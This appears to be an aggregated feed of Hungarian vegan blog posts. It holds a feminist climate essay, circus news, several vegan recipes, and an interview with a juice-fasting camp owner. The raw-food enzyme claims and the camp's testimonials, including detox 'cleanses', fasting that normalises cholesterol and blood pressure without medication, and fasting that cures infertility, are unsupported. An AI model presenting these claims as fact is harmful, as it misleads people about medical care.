(vagy alig használsz kozmetikumokat), akkor is megszólnak. Könnyű lenne azt mondani, hogy abba kéne hagyni ezt az egészet, elég lenne egy szappan meg egy dezodor, de gyerekkorunk óta suttogja, néha üvölti a fülünkbe a média, hogyan kéne kinéznünk, miért nem vagyunk elég jók. Még fokozatosan elkezdve is nehéz lemondani a sok kozmetikumról anélkül, hogy szarul éreznéd magad a bőrödben, és anélkül, hogy jelentős önbizalmat vesztenél (amit aztán visszanyerhetsz, de ez is önmunka eredménye, még egyszer mondom: önMUNKA eredménye. És mint minden munka, ez is energiát igényel). Divat Nem mondok nagy újdonságot azzal, hogy a nőktől öltözködés terén is nagyobb az elvárás, mint a férfiaktól. Sokkal többféle ruha és cipő szükséges egy átlagos életvitelhez egy nőnek, mint egy férfinak. Egyébként az, hogy a férfiaknak sokkal kevesebbféle színű ruhát és kiegészítőt gyártanak, egyrészt természetesen igazságtalanság velük szemben, ugyanakkor így könnyebb jól kinéző ruhaösszeállításokat felvenniük a hétköznapokban, ami kevesebb ruhát igényel, így alapvetően fenntarthatóbb. Még egy példa: Ha ugyanabban az öltönyben mész az összes barátod esküvőjére, senkinek sem tűnik fel, de a nőknek valamiért illik változatosan öltözni még alkalmakra is, ráadásul esküvőre nem illik fehéret, feketét és pirosat felvenni, viszont más alkalmakra szükség lehet fekete ruhára is. És persze mindhez más színű cipő és táska illik. Apropó táska: a női nadrágok zsebei átlagosan fele akkorák, mint a férfi nadrágoké, akkor is, ha ugyanakkora maga a nadrág, és alkalmi ruhákon leggyakrabban egyáltalán nincs zseb. Mind a kozmetikai ipart, mind a divatipart kezdik meghódítani a környezetbarát termékek, ám ezek sokkal többe kerülnek, mint a hagyományos megfelelőik. Vagy az van, hogy az adott cég tényleg jobbá akarja tenni a világot, és a minőségi, környezetbarát alapanyagok és az etikus előállítás drágább. Vagy pedig – és ilyen is van – meglovagolja csupán az aktuális öko divathullámot. Hogy az adott termék melyik kategóriába tartozik – extra kutatómunkával kideríthető, és persze ez a munka is a nőkre hárul. Kapitalizmus A kapitalizmus pont úgy működik, mint egy pszichopata ember: nem érdekli az emberi élet, nem foglalkozik a valódi értékekkel, manipulálja az embereket és kijátssza a szabályokat. A kapitalizmust egy dolog érdekli: a profit. És meg is szerzi: a világ vagyonának 75%-át az emberiség 5%-a birtokolja. Tehát kb. 350 millió emberé az összes pénz (és anyagi javak) 75%-a. A maradék 7 milliárd ember osztozik a maradék 25%-on. A Föld életének 0,00000011%-ában létezik a kapitalizmus, és máris tönkretette a bolygót, állatfajok tömeges pusztulását okozza – és lehet, hogy az emberiség pusztulását is. Mik is egy törtető, karrierista ember legfőbb tulajdonságai? Nem érzelmeskedik, az üzlet mindenek felett, átgázol másokon, megszerzi, amit kitűzött magának, sosem mutatkozik gyengének, sebezhetőnek, háborúkat indít, ha megsértődik, és ha ez amúgy profitábilis. Ez nagyban egybevág az úgynevezett toxikus férfiasság* képével: hogy a férfi nem érzelmeskedik, “racionálisan” (tehát más embereket és az emberi értékeket semmibe véve) hoz döntéseket, nem mutatkozik gyengének, sebezhetőnek, nem vallja be, ha hibázott, vagy ha nincs igaza, elsődleges célja, hogy pénzt keressen. A valódi racionalitásnak amúgy semmi köze ahhoz, amiről itt szó van, mivel ezek az emberek még jobban ki vannak szolgáltatva a saját érzelmeiknek, amikkel önismeret hiányában nincsenek tisztában. *A toxikus férfiasság kifejezés nem azt jelenti, hogy minden férfi toxikus (mérgező), hanem azt, hogy a társadalom nagyon sok mérgező tulajdonsággal ruházza fel a férfiakat, akik ennek meg akarnak felelni, pl. agresszió, szenvtelenség, az érzelmek elnyomása stb. Szerencsére ez a fajta férfi “ideál” kihalófélben van. Mert sem az egészséges lelkivilággal, sem az egészséges kapcsolatokkal, sem a fenntartható jövővel nem összeegyeztethető. Ha férfi vagy, és úgy érzed, eleget teszel a párkapcsolatodban házimunka és fenntarthatóság terén, kérdezd meg a partnered, hogy egyetért-e, és beszélgessetek erről! A férfiak gyakran nem is tudnak arról a rengeteg agymunkáról, amit a nők a hétköznapokban végeznek. Muszáj a férfiaknak is nagyobb részt vállalniuk a fent felsorolt dolgokban, a hétköznapi szexizmus legyőzésében, és le kell küzdeniük a saját, választott tehetetlenségüket. Akkor talán sikerülhet együtt visszafordítani az éghajlatváltozást. De az is lehet, hogy a nők vállán van a világ megmentése. Vajon elbírjuk? Vajon tényleg mi lennénk a “gyengébbik nem”? Tedd a kedveceim közé 0 The post A klímaváltozás feminista probléma (is) appeared first on VegaNinja.
Egy német cirkusz hologramokkal helyettesítette az állatokat
Ha kiskorunkban a cirkusz szót hallottuk, sokunknak az elefántok, tigrisek, lovak jutottak eszébe az akrobaták és bohócok mellett. De a német Roncalli Cirkusz hologramokra cserélte a hús-vér állatokat a varáslatos és erőszakmentes élményért. A Roncalli Cirkusz 1976-os alakulása óta sajnos állatos előadásokra specializálódott, de talán végre észhez tértek, és állításuk szerint a hologramos show-val felvették a harcot a szakmán belüli állatkínzással. Most is vannak elefántok, lovak, még tüzes karikák is (ez mondjuk szerintem nem mutat túl jó képet az elveikről), de egyetlen állat sem valódi. Olyan 3D holografikus, lézerprojektoros technológiát használnak, amivel a 32×5 méteres arénában, teltházas közönség esetén is mindenki 360°-ban látja az egész, vetített előadást 3 dimenzióban. A fantasztikus, színes, magas felbontású előadás első a világon, és világszerte máris nagy visszhangja van: az emberek elgondolkodtak végre rajta, hogy megéri-e a szórakozásuk a sok állat szenvedését, rabságát, és a borzasztó körülményeket és idomítási módszereket. Aktivisták már egy jó ideje hoznak nyilvánosságra leleplező videókat cirkuszokról, ahol verik, éheztetik és gusztustalan körülmények között tartják az állatokat, akik feszített tempóban, óriási közönség előtt, szoros időbeosztásban mutatják be a betanított trükköket, ezzel hatalmas bevételt hozva az intézményeknek. Egy videó a 3D-s hologramos cikruszról, angol felirattal, német nyelven: Az Egyesült Királyságban épp most döntenek egy olyan szabályozásról, amely 2020-tól megtiltaná az utazó cirkuszoknak a vadállatok használatát. (A tiltás nem vonatkozik a szelídített állatokra, sem az állandó épülettel rendelkező cirkuszokra.) Egyébként az EU-ban már 28 országból 20-ban tilos a vadállatok cirkuszi szerepeltetése. Magyarországon még nincs ilyen szabályozás, bár 2018 legnépszerűbb aláírásgyűjtése éppen ezt követelte. További infók: roncalli.de Forrás: Bored Panda Tedd a kedveceim közé 0 The post Egy német cirkusz hologramokkal helyettesítette az állatokat appeared first on VegaNinja.
Roppanós laska gomba tallérok
Amikor csak úgy csipegetnél valami finom, roppanós valamit, amit akár főétel feltéteként vagy mártogatni is kínálhatod a vendégeknek, ilyenkor szoktam előkapni a csicseriborsó lisztes bundázást. Nem véletlen, hogy mi magyarok arról vagyunk híresek, hogy bármit bebundázunk, de ami finom az finom. Ez a változat glutén,-tojásmentes és kókusz olajban sült. Hozzávalók: Laska gomba (kb. 30-50 dkg) kb. 20 dkg +10 dkg csicseriborsó liszt vagy sárgaborsó liszt 1/2 tk füstölt paprika késhegynyi őrölt fekete bors késhegynyi őrölt szárított fokhagyma 1/2 tk tengeri só kb. 2 dl víz kókusz olaj A csicseriborsó lisztbe keverjük a sót és a fűszereket, a 10 dkg lisztet simán hagyjuk, a gombákat megmossuk és beleforgatjuk a lisztbe majd egyesével belemártjuk a masszába és a forró, bő kókuszolajban aranybarnára sütjük őket. Papírtörlő kendőre tesszük őket és még melegen tálaljuk saláták mártogatós mellé vagy feltétként.
Gluténérzékeny, vegán vagy a tejet nem bírja? Töltse le ezt a magyar alkalmazást
A gluténérzékenyeknek és a vegánoknak is segítséget nyújthat a magyar Freezon, amely képes listába szedni minden olyan éttermet, kávézót és pékséget a világon, ahol speciális étrendhez igazodó termékek kaphatók.
Rettenetesen kevés zöldséget eszik a magyar, és ez baj
Újabb szomorú tényről tett közzé adatokat az Eurostat: sehol máshol nem rágcsálnak olyan keveset a zöldségekből az EU-ban, mint nálunk. Pedig kellene, hogy együnk belőlük, nagyon is.
Vegán ruszli házilag – ecetes, hagymás nem hal, padlizsánból
Aki nem ismeri a ruszlit: ecetes hal hagymával és zöldségekkel eltéve. Többnyire befőttes üvegben lehet kapni, néha vödörben. Elég vad koncepció, sokan utálják is, de vannak, akik szeretik; én is szerettem, mikor még ettem állatokat. Szerintem tökéletesen sikerült elkészíteni a vegán verzióját padlizsánból – egy “titkos” összetevő viszont kell hozzá. Hozzávalók: padlizsán hagyma paradicsom kaliforniai paprika, esetleg kápia wakame alga só cukor ecet A wakame alga nem tartozik a legolcsóbb összetevők közé, 1600 Ft körül van egy tasak ára, azonban nagyon erős hal íze van, vegán halászléhez, sült tofu-“halhoz” is használható, sokáig elég egy kis zacskónyi, mert keveset kell belőle használni. Általában használat előtt érdemes beáztatni, de ebben a receptben amúgy is vizes lébe tesszük, így nem igényel előkészületet. A padlizsánt megmossuk, és megsütjük sütőben, egészben, héjában, annyira, hogy még rugalmas legyen, ne süljön át teljesen. Én kb. 200 fokon, légkeverés nélkül, alulról-felülről sütöttem kb. 20-30 percig. Ez után levágjuk a tetejét (ahol a szára van), így a vágásnál megkezdve viszonylag könnyű kézzel meghámozni. A héját is beletehetjük, de az rágós marad, érdemesebb kidobni. A hagymát félbe vágjuk és felkarikázzuk, a paradicsomot és a paprikát is feldaraboljuk. Én egy kis maréknyi padlizsánhoz egy kicsi hagyma felét, egy fél paradicsomot használtam el, és pár kocka paprikát. A padlizsánt, mintha hámozás után tovább hámoznánk a kezünkkel, csíkokra tépkedjük. Ezt nehéz elmagyarázni, de ilyen sült állapotban hosszanti rostokra jön szét magától, nem kell hozzá kést használnunk. Valamennyire kinyomkodjuk a levét. Közben egy befőttes üvegbe ecetet töltünk. A képen látható üvegbe fél ujjnyi magasságig töltöttem az ecetet, tettem bele egy teáskanál cukrot (én gyümölcscukrot használok), és kb. fél kávéskanál sót. Ez nyilván ízlésenként változhat. Töltsük fel az üveget kb. félig vízzel, keverjük el alaposan. Ez után beletehetjük a hagyma és a zöldségek egy részét, egy adag padlizsánt, majd egy kávéskanál wakame algát. Ez után jöhet egy újabb adag hagyma, zöldség, padlizsán és alga. Nyomkodjuk le az egészet, hogy ellepje az ecetes lé. Hűtőben tároljuk, kb. 1-2 óra múlva már átveszi a halas-ecetes ízt a padlizsán. The post Vegán ruszli házilag – ecetes, hagymás nem hal, padlizsánból appeared first on VegaNinja.
Peanut butter jelly szendvics – mi ez, és hogyan készítsünk hozzá mogyoróvajat házilag, földimogyoróból? – Vegán recept
Az amerikai kultúrában gyakran emlegetik (és eszik) a PB&J-t, azaz a peanut butter jelly sandwichet. Ezt nyomják reggelire, ezt csomagolják a gyereknek uzsonnára, és ha csak úgy megéheznek, nasinak is megteszi. Angolul tudók már kitalálhatták, hogy mogyoróvaj és dzsem vagy lekvár kerül a két szelet kenyér közé, vagy a szelet kenyér tetejére. Elég tömény, a mogyoróvajnak igen magas az olajtartalma, a lekvárok pedig cukrosak, de szerintem még így sem feltétlen haladja meg a zsír- és cukortartalma az átlagos, magyar sajtos-kecsapos szendvicsét, és mivel állati eredetű anyagoktól mentes, azoknak a káros hatását is elkerüljük. Aki a könnyedebb, de tápláló reggeliket kedveli, annak a zabkása recepteket ajánlom. A mogyoróvajas-lekváros szendvics elkészítését nem nagyon kell magyaráznom, de talán a beszerzési helyekről érdemes beszélni. Lekvár vásárlásánál a legfontosabb, hogy olyat vegyünk, ami zselatintól és kárminoktól mentes. A zselatin állati csontokból és melléktermékekből készül, a kármin pedig összezúzott bíbortetvekből. Mogyoróvaj (és földimogyoró) vásárláskor arra figyeljünk, hogy igyekezzünk pálmaolajmentes termékeket választani (ez elég nehéz). A közepes- és nagyáruházakban, kínai vegyesboltokban, bioboltokban és sok más helyen kapható, van smooth és crunchy verziója. A smooth teljesen sima állagú, mint egy mogyorókrém (de nem olyan édes, és nem kakaós, hanem földimogyoró ízű), a crunchyban pedig mogyoródarabok vannak. A kenyérválasztásról hamarosan írok egy következő cikkben. Hogyan készítsünk házilag mogyoróvajat: Hozzávalók: 200 g földimogyoró (lehetőleg sótlan, pálmaolajmentes, pl. Naturfood) 1 kávéskanál só 1 teáskanál cukor (én gyümölcscukrot használok) 1-2 evőkanál kókuszolaj olvasztva (vagy más olaj) A mogyoró felét és a többi összetevőt egy magas falú edénybe tesszük, és botmixerrel elkezdjük eldolgozni. Mikor már krémes, szép lassan adagoljuk hozzá a többi mogyorót, és krémesítsük annyira, amennyire szeretnénk, vagy amennyire a botmixerünk bírja. Tippek: Az olajos magvak megterhelik a botmixert, úgyhogy vigyázzunk, hogy ne melegedjen túl, és egy perc mixelés után pihentessük kicsit. Sózott mogyoróval is dolgozhatunk, a mogyik feléről mossuk le a sót, majd várjuk meg, hogy kicsit megszáradjanak. Utána kóstolgassuk, és ízlés szerint adjunk hozzá sót, ha szükséges. Ha a mogyorónk nincs pirítva, száraz serpenyőben, folyamatosan kevergetve-rázogatva megpiríthatjuk őket az extra íz érdekében. A forró mogyorókkal azonban várjunk, mert megolvaszthatják a műanyag botmixert vagy mixelőedényt. The post Peanut butter jelly szendvics – mi ez, és hogyan készítsünk hozzá mogyoróvajat házilag, földimogyoróból? – Vegán recept appeared first on VegaNinja.
Magyaros sütőtök-krémleves
Karácsonyi akció részleteiért KATT IDE FEKETE PÉNTEK akció: november 25-éig 15% kedvezmény bármelyik főzőtanfolyam árából Esküszöm, már vagy tizenötféle sütőtök-krémlevest kipróbáltam. Volt keleties, volt édeskés, volt krumplis, volt sokzöldséges, volt afrikai, szóval, mindenféle. De magyaros miért nem? Létezik egyáltalán magyaros sütőtök-krémleves? Na, ennek jártam utána ma. Nem tudom, hogy én találtam-e ki (valószínűleg nem, haha), de ha csak megtaláltam, már annak is nagyon örülök! ;) Hozzávalók két adaghoz - 150 g sütőben megsült tök (már sütve mérve) - negyed fej vöröshagyma - 1 gerezd fokhagyma - 200 ml növényi tej (minél semlegesebb ízű, javaslom a cukrozatlan szójatejet vagy rizstejet) - 2 mk édes pirospaprika - fél mk csípős pirospaprika - 1 késhegynyi őrölt fahéj - fél mk füstaroma ( tudod, a teljesen természetes, folyékony verzió) - só ízlés szerint - Egy evőkanál olajon pirítsd meg a vékonyra szeletelt vöröshagymát, majd amikor majdnem kész, mellette a felkarikázott fokhagymát is. Zárd el alatta a tüzet, majd szórd rá a pirospaprikákat. Gyönyörű színe lesz, és – hű, hogy szállnak azok az illatok! :) Jól keverd össze. - A botturmix poharába kapard bele a sütőtököt, hintsd rá a pici fahéjat, locsold meg füstaromával és kanalazd bele a pirított hagymákat. - Öntsd fel a tejjel, lazítsd még ugyanannyi vízzel, sózd meg, és turmixold krémesre. - Pirított hagymaszeletekkel tálald. Jó étvágyat! Elkészítési idő (megsült tökből): 5 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven FEKETE PÉNTEK akció: november 25-éig 15% kedvezmény bármelyik főzőtanfolyam árából Karácsonyi akció részleteiért KATT IDE The post Magyaros sütőtök-krémleves appeared first on Kertkonyha.
Magyarország kivi- és fügehatalom akar lenni
A klímaváltozás előnyei: Zalából jön a déli gyümölcs, már a minisztérium is lelkes.
Vinetta, az erdélyi padlizsánkrém (laktózmentes, gluténmentes, vegán)
2018. szeptember 24. Zizi kalandjai
Tűz berobbantása Szeretek történetet írni a receptekhez. Leírni azt, hogy hogyan jött létre, ki vagy mi inspirált, hogyan készült és igykeszem fotókkal megadni a hangulatot hozzá. Ez a recept is tele lesz fotókkal... igazi hygge hangulatot teremtettünk barátokkal a múlt héten. Erdélyi barátokkal, akik most már Magyarországon élnek. Télen megbeszéltem velük - miután megkóstoltam a... Source
Szilvakrémes sütemény (nyers, vegán)
A nyarat a dinnye miatt szeretem, a nyár végét a nagy barackok miatt, az őszt pedig a szilva miatt. Emlékszem, Magyarországon is még karácsony előtt néhány héttel is találtam magyar szilvát piacon akkor, amikor enyhe volt a tél kezdet. Őrizgettem a balkonon, letakarva karácsonyig, hogy aztán jó kis szilvakrémlevest készítsek gesztenyehabbal. Ehhez a sütihez is piacon szereztem a szilvát, igaz, egészen más tipusú piacon. Itt úgy hívják, hogy carboot-sale. Az emberek az autójuk csomagtartójából árulnak mindenféle dolgot, ami már nem kell az otthonukban. Ezeken az alkalmakon van egyetlen egy zöldség-gyümölcs árus. Nos, tőle veszem a gyümölcsöt április végétől október végéig. Mivel ezek a carboot sale alkalmak kültéri helyszínen vannak (legalább is, a mi városunkban), ezért sajnos télen nem tudok tőlük vásárolni. Szeretem a mienket, mert nagyobb tételben is tudok venni gyümölcsöt, zöldséget, úgy pedig olcsóbb. Ehhez a szilvához is úgy jutottam, hogy egy ládával vettünk. Általában spanyolból érkezik az árú, legalább is a dobozokon általában rajta van a származás. Az eper és alma jön leginkább brit földről. Ugyanakkor egyfajta lutri, hogy épp milyen portékájuk van. No, minden esetre most nem főztem a szilvából levest, meghagytam nyers süteménynek. Két alkalomból is. Egyik este néhány barátunk jött hozzánk, rá 1-2 napra pedig egy gluténmentesen étkező barátnőmnek adtam minitortát szülinapjára. Mindkét alkalommal jól bevált volt. Tehát tortát, süteményt is lehet belőle készíteni, attól függően, milyen alakba tesszük a sütemény alapját és rá a krémeket. Miért együnk / készítsünk nyers süteményt? Sok rost tartalma és a benne lévő természetes cukortartalma miatt egészségesebb édesség források. Mazsolának/datolyának köszönhetően édes finomság, cukor hozzáadása nélkül. Mivel nem kerül sor hevítésre, vitaminokban, ásványi anyagokban és enzimekben gazdag édességről van szó. Azért fontosak az enzimeket a nyers ételek által a szervezetbe juttatni, mert jó emésztést és anyagcserét biztosítanak. Lehetővé teszik a tápanyagok (vitaminok, nyomelemek, ásványi anyagok, fehérjék, szénhidrátok, zsírok és olajok) szervezetbe kapcsolását. Hőkezelés hatására azonban (kb. 55°C fok felett) lebomlanak, és ezek hiányában a különböző tápanyagok vagy nem is hasznosulnak, vagy a szervezet saját tartalékaiból kell a szükséges enzimeket előállítania (ami például a hasnyálmirigy természetellenes túlterheléséhez vezet). A recept A desszert alapja Hozzávalók: - kb. 2-3 nagyobb bögre olajos magvak, mogyorófélék (pl.dió, lenmag, mogyoró) - datolya és/vagy mazsola - víz Elkészítés: Az olajos magvakat és mogyoróféléket külön külön jó alaposan megdaráljuk pl. kávédarálóval. A datolyát felaprítjuk, meleg vízbe beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. Ha csak mazsolával dolgozunk, azt is beáztatjuk, hogy felpuhuljon, majd a vizet leszűrjük róla és hozzákeverjük a mag őrleményhez. Egy kevés vizet adunk még hozzá, ha szükséges ahhoz, hogy egy nagy gombócot tudjunk formálni ebből a masszából. Ha csak egy fajta mogyoró/diófélével dolgozunk, akkor úgy is elkészíthetjük, hogy először nagyjából összeaprítjuk a géppel a mogyoró/diófélét, majd hozzáadjuk a megáztatott datolyát/mazsolát és tovább őröljük az aprító géppel addig, míg eggyé tapad össze. Egy tortaformát vagy egy tepsit és folpackkal kibélelelünk és az aljába nyomkodjuk a nyers tésztát. Hűtőbe tesszük, míg a másik két krém elkészül. A szilvás krém receptje Hozzávalók: - 2-3 bögrényi nagyon érett szilva (fagyasztott is lehet) (Bármelyik fajta barack jó: besztercei, ringló, president, stanley stb.) - meleg vízben áztatott datolya (kb 1/2 bögrényi) - max. 1 dl víz - 4-5 ek útifűmaghéj Elkészítés: Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket az útifűmaghéj kivételével tegyük bele. Indítsuk el, és ha a szilvából szilvaszósz lett, akkor kb 4-5 evőkanálnyi útifűmaghéjjal is turmixoljuk össze. Hagyjuk állni. Nagyjából negyed óra múlva kenhető állagú krém lesz belőle. Ha nem elég szilárd ahhoz, hogy kenni tudjuk, még némi útifűmaghéjat keverjünk hozzá (fakanállal is átkeverhető). A kész krémet egyszerűen elkenjük az őrölt magokból készült tésztán. Hűtőben tároljuk további munkálatokig. A világosabb hab receptje Hozzávalók: - 1/2 bögrényi dióféle vagy mogyoróféle - 1/2 bögrényi meleg víz - 1-2 ek áztatott mazsola vagy datolya - 1 ek útifűmaghéj - 1/2-1 bögre magozott szilva Elkészítés: A diófélét és a mazsolát beleszórjuk a turmix gépbe (ha van lehetőségünk a diófélét előáztatni, még jobb), meleg vizet öntünk rá és összeturmixoljuk. Hamar egy tejföl-szerű állagot kell kapjunk. Ehhez turmixoljuk a szilvát. Végül hozzáadunk kb. 1 ek útifűmaghéjt, átkeverjük, majd a sütemény tetejére simítjuk. Végső műveletként szilvakarikákkal vagy fél szilvaszeletekkel diszítjük. Tálalásig hűtőben tároljuk.
"Maximális az ellátás a levekben és bővőlködő a szeretet"
Ahogy korábbi írásomban beszámoltam róla, idén nyáron férjemmel közösen egy eldugott, kis, észak-szerbiai falucskában, Crna Bara-n (magyarul Fekete-tó) egy 10 napos léböjt táborban vettünk részt. Az egész tábor ideje alatt kimondott éhséget nem éreztünk, ha egyszer-kétszer reggel vagy este meg is kordult a gyomor, valóban nem hiányzott az étel, az ételbe harapás is csak inkább a tábor vége felé, amikor már táboron kívüli illatok hatása jobban beindította a megszokott ételekre való gondolást. A lényeg viszont, hogy üdén, frissen éreztük magunkat a táborozás ideje alatt és után is, valamint bizonyos egészségügyi problémáktól megszabadultunk. Egyben segített egy hatalmas erős lépést megtenni annak érdekében, hogy amennyire csak lehet tényleg növényi táplálékokat fogyasszunk. (A tábor hatására kezdtem el olvasni a 80/10/10 könyvet Dr. Douglas N. Graham-től.) Nehéz időszakon voltunk túl, ha csak az elmúlt pár évet tekintem, hiszen az új ország (Anglia), új környezet, új szokásokat hozott. Szerettünk volna egészségesebb szokásokat kialakítani, amihez szintén hozzásegített a tábor. Vidám táborozók és dolgozók közös csoportképe Hazatérésünk óta jó néhány ember mondta, hogy egész máshogy nézünk ki, egészségesebb kinézetünk van, mintha megfiatalodtunk volna (ajánlom a tábort botox helyett minden nőnek is). A táborozás során igyekeztem több emberrel beszélgetni, különösen, hogy a táborozók zöme már járt léböjt táborban, és nekik egészen más élmény a visszatérés miatt is az idei tábor. Érdekelt a tapasztalatuk, amit eddig éltek át a táborok során. Kiváncsi voltam, vajon mi vezérli vissza ide azokat az embereket, akik már léböjtöztek egyszer-kétszer vagy akár ötször is. Ezekről a tapasztalatokról is szeretnék idővel beszámolni, de a mostani írásomban szeretném megosztani a Kedves Olvasóval a léböjt tábor tulajdonosával készített interjút. Sajnos a léböjt tábornak jelenleg nincs weboldala, pedig jelenlegi világunkban a legtöbb ember kezében ott van a ragadós okos telefon, ami által könnyebben rátalálhatnának erre a táborra. Többek között ezt próbálom pótolni a léböjt táborról szóló bejegyzéseimben, akár csak ezzel az interjúval. A tábor tulajdonosa, Német Antal, szerbiai származású magyarul és szerbül mondhatni anyanyelven beszélő egy gyermekes, ötvenes éveiben élő családapa, aki - bátran mondhatom - nem nyerességvágyból tartja fenn a táborokat, gyakorta a saját fizetéséből is besegítve annak működésébe. Célja, hogy minél több ember egészségesen távozzon egy 10 napos léböjt tábor után, valamint a táborok segítségére szolgáljanak az embereknek a helyes és egészséges életmód rátalálására, megerősítésére. A táborban - mialatt a léböjtöt ő is velünk folytatta - szorgalmasan intézte a táborral járó szervezési feladatokat, s a nehezebb fizikai munkát sem vetette meg. Mi sem mutatja jobban, hogy a vele tartott interjúmat három különböző alkalommal tudtuk csak megejteni. - Hol és mikor kezdődött a léböjt tábor gondolata? 2005-ben Siposné Szécsi Ilona ötletére bólintottam. Mikor kérdeztem, mi minden kell, mondta, hogy sok répa, cékla és más zöldségek, gyümölcsök. Így kaptam az alkalmon és ezeket is ültettem. Az első léböjt tábor hét napos volt, egész más körülmények közt, mint most. Azóta sokat fejlődött és most is fejlődik a hely. Ezen a táboron kb. 17 résztvevő volt. Nagyon jól sikerült, áldott kis csapat volt. Jókedvű volt mindenki, kellemeseket beszélgettünk. Egy szobába aludtam az egyik táborozóval, aki a tüdejére kapott kemoterápiát a tábor előtti időszakban. Megfogta a szívem, amikor könnyes szemekkel mondta a tábor végén, hogy ő csak egy táborba jött, de nem csak fizikai egészségére szolgált, hanem lelkileg is sok támogatást kapott. A képen: Német Antal és Siposné Szécsi Ilona, akik nélkül a tábor nem jöhetett volna létre és a táborozók közé élénkséget hozó Rebeka, aki a tulajdonosnak és feleségének, Évinek a kislánya. - Évente hány alkalommal rendeztek ilyen léböjt tábort? Évente általában kétszer van átlagosan. Egy szabadkai származású, Németországban élő segítségünk van, de ő iskolába jár most. Volt, amikor három tábor is volt egy évben, mindig nyaranként vagy nyárhoz közeli időpontban. Most építünk át egy épületet, ahol a körülmények lehetővé teszik majd a hűvösebb időszakokban is a táboroztatást. Az első évben 7 napos, utána pedig 10 napos volt mindegyik tábor. - Miért 10 napos a tábor? A vese tisztítás 5 nap, máj tisztítás 5 nap, így hatékonyabb, mint a 7 napos periódus. - Más táborok is szerveződnek itt? Nyers ételek tábor is szokott lenni. Öt éven keresztül elég sok ember jött el, a legutolsó táborban közel 50 fő vett részt. Itt inkább bemutató jelleggel történik minden. A valós munkacsapat mellé beengedtünk néhány embert a konyhába, akik szintén segítettek és így tanulták is az ételek elkészítését, mindeközben kint is volt egy bemutató szakács. Aszalványok, csírák, öntetek, salátafélék készülnek, de semmi tűzhely használat nem történik. Gyerektábort is szerveztünk az idei évben és szeretnénk ebből is rendszert csinálni szegény gyermekek számára, akiknek a szülei nem engedhetik meg, hogy akár egy táborba elküldjék gyereküket. Ez a tábor teljesen ingyenes volt számukra, vegetáriánus konyhával. Sok gyermek érkezett túlsúllyal, s mivel itt sokat mozogtak, reggeli torna, játékok a friss levegőn, kézműves foglalkozások, így több gyermek is fogyott a táborozás során. A táborból hazaérve ők kérték, hogy otthon is fogyasszanak több zöldséget, gyümölcsöt. A tábor, ingyenes volt ezeknek a gyerekeknek és környékbeli adományokból sikerült az élelmet előteremteni. Sokan segítettek gyümölccsökkel, zöldségekkel és önkéntes munkákkal is. - Milyen eredményeket tudsz felidézni az elmúlt évek táboraiból? Közel 1200 ember fordult meg eddig, különféle bajokkal, problémákkal. Például egy 40 éves németországi nő úgy érkezett, hogy mindkét lába nagyon dagadt volt, szívproblémával is küzdött. Tisztítókúrázott, kezeltük a lábát vérkeringést serkentő hidroterápiával és 10 nap alatt leapadt a lába. Következő alkalommal már úgy jött a táborba, hogy nem volt feldagadva a lába. Valakinek fülzúgása volt, ami lecsendesedett és ritkábbá vált. Más személyek hátfájással érkeztek és távozáskor már nem fájt nekik. Egy hölgy térdfájással érkezett és a hetedik napon már a tótól, ami három kilométer, szinte futott vissza a táborba, nem gyalogolt. Hihetetlen, de valóság! Volt, akiknek nem lehetett gyermekük, nem jött össze, hiába próbálkoztak. Nem szerettek volna hormonális kezeléseket kapni. 4-5 személynek is volt olyan tapasztalata, hogy a léböjt tábor után gyermekáldásban részesültek. Van olyan, aki már a gyermekével jön vissza léböjtözni. Egy asszony csuklóját nem tudta hajlítani az érkezés napján, a 10 nap alatt pedig elérte, hogy tudta mozgatni a keze fejét gyönyörűen. Sokan érkeztek az évek során a táborokba úgy, hogy nagyon maguk alatt voltak, de mi mindig igyekszünk mindenkit szeretettel körbe venni. Valaki könnyes szemmel számolt be a tábor végén arról, hogy olyan szeretetet érzett itt, amit gyermekkorában édesanyjától kapott. Más valaki igen magas vérnyomással érkezett (180-190) és 10 nap alatt leesett a vérnyomása szép lassan (110-re), úgy, hogy nem szedett gyógyszereket és nem lett rosszul. A holland-német határ közeléből jött egy táborozó meglehetősen magas koleszterinszinttel, az orvosok sem tudtak már mit kezdeni vele, léböjtözés után még a nyers táborban is maradt egy darabig. Mikor hazament és vérvizsgálatot végeztek nála, az orvosa teljesen ledöbbent, hogy a koleszterinszintje normalizálódott. Meg is kérdezte, hogy mi történt, mivel az előző egy évben a gyógyszeres kezelés jóformán semmit sem hatott. A páciens elmondta neki, hogy itt járt a léböjt táborban. Ő a következő évben is eljött és anyagilag hozzásegítette a tábort az újabb fejlesztési lehetőséghez. Volt olyan tábor, ahol 96 vendég sereglett össze, később pedig volt egy tábor, ahol 60 német jött el. - Mit gondolsz, mi a tábor titka? A jó Isten áldását látom. Mi is igyekszünk mindent beleadni, hogy szeretettel vegyük körbe a vendégeket, beszélgetni velük, hasznos időket tölteni velük. Német vendégek azért is szeretnek ide járni, mert elmondásuk szerint a tábor tulajdonosa sok helyen nincs velük, én meg ott vagyok köztük, én is léböjtözöm, figyelek rájuk, együtt töltjük az egész napot. - Ha egy nem hívő ember, egy nem keresztény jön el, hogyan tudja itt jól érezni magát? Alapból egy jó légkör van itt. Az előadások, áhitatok is jó hatást gyakorolnak az emberekre, akárcsak a közös beszélgetések is. Egy nem hívő számára az első néhány nap talán szokatlan lenne, de eddig mindenki jól feltöltődve távozott vallási hovatartozástól vagy gondolkodásmódtól függetlenül. - Kiknek ajánlod a léböjt tábort? Szinte mindenkinek, aki nyitott erre. Nem anyagi szempontból tekintve, de minden embernek fontos lenne évente egy ilyen tisztító kúra, mert amit az élelmiszeripar előállít, amit a boltokban vásárolni lehet, rengeteg tartósítószert, méreganyagot tartalmaz, bizonyos környezetszennyezettségi befolyások is ártalmasan érnek bennünket. Szervezetünk sok idegen és méreganyaggal találkozik, aminek a következménye a sok allergia, daganatos megbetegedés, betegségek, különféle izületi fájdalmak. Az élelmiszer termelés nem olyan állapotban van napjainkban, mint régen. Mindent vegyszereznek. Különösen az állati eredetű táplálékot fogyasztók magas számú méreganyagokat juttatnak a szervezetükbe. A bemérgezett ételek okozzák a legtöbb egészségügyi problémát. - 